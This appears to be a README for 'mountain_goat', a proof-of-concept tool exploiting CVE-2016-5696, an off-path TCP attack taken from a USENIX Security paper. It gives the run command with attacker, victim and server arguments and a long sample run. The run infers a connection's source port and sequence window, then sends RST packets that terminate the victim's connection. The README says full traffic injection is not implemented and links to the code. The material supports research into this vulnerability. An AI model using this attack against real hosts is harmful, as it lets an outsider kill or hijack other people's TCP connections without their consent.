Mountain Goat - Global Rate Limit TCP Off-Path Attack
Hi, I’m a mountain goat and I’m going to ram your TCP connections, because that’s a pretty goat thing to do.
This is a PoC demonstrating techniques exploiting CVE-2016-5696 Off-Path TCP Exploits: Global Rate Limit Considered Dangerous by Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, Srikanth V. Krishnamurthy, Lisa M. Marvel presented at USENIX 25th Security Symposium.
./mountain_goat <attacker_ip> <attacker_port> <victim_ip> <server_ip> <server_port>
[ENTERING] state_synchronize
200 probes dispatch in 0.98858 seconds
200 probes dispatch in 0.98115 seconds
200 probes dispatch in 0.98622 seconds
[ENTERING] state_source_port_inference
10001 syn+ack probes in 0.84733 seconds
5001 syn+ack probes in 0.42722 seconds
2501 syn+ack probes in 0.20866 seconds
1251 syn+ack probes in 0.10266 seconds
625 syn+ack probes in 0.04356 seconds
313 syn+ack probes in 0.02778 seconds
156 syn+ack probes in 0.01398 seconds
78 syn+ack probes in 0.00697 seconds
39 syn+ack probes in 0.00269 seconds
20 syn+ack probes in 0.00181 seconds
10 syn+ack probes in 0.00079 seconds
5 syn+ack probes in 0.00050 seconds
3 syn+ack probes in 0.00026 seconds
2 syn+ack probes in 0.00021 seconds
1 syn+ack probes in 0.00011 seconds
Source Port interference determined: 41154
[ENTERING] state_sequence_chunk_inference
Probing Sequence Chunk 0 - 144800000
Probing Sequence Chunk 144800000 - 289600000
Probing Sequence Chunk 289600000 - 434400000
Probing Sequence Chunk 434400000 - 579200000
Probing Sequence Chunk 579200000 - 724000000
Probing Sequence Chunk 724000000 - 868800000
Probing Sequence Chunk 868800000 - 1013600000
Probing Sequence Chunk 1013600000 - 1158400000
Probing Sequence Chunk 1158400000 - 1303200000
Probing Sequence Chunk 1303200000 - 1448000000
Probing Sequence Chunk 1448000000 - 1592800000
Probing Sequence Chunk 1592800000 - 1737600000
[!] Sidechannel socket lost, reconnecting.
Probing Sequence Chunk 1592800000 - 1737600000
Probing Sequence Chunk 1737600000 - 1882400000
Probing Sequence Chunk 1882400000 - 2027200000
Probing Sequence Chunk 2027200000 - 2172000000
Probing Sequence Chunk 2172000000 - 2316800000
Probing Sequence Chunk 2316800000 - 2461600000
Probing Sequence Chunk 2461600000 - 2606400000
Sequence is in Chunk 2461600000 - 2606400000
Adjusted step from 14480 to 43440
[ENTERING] state_sequence_bin_search
Sequence in targets window: 2533710400
[ENTERING] state_having_a_blast
Blasting RSTs: 2533695920 - 2533710400
Connection terminated, baaaah
This is not a complete implementation of the traffic injection attack. Its merely an implementation up to the inference of the current clients sequence number window. Due to the timing dependend nature it may need additional tuning depening on the host to properly function.
The code can be found here: https://github.com/Gnoxter/mountain_goat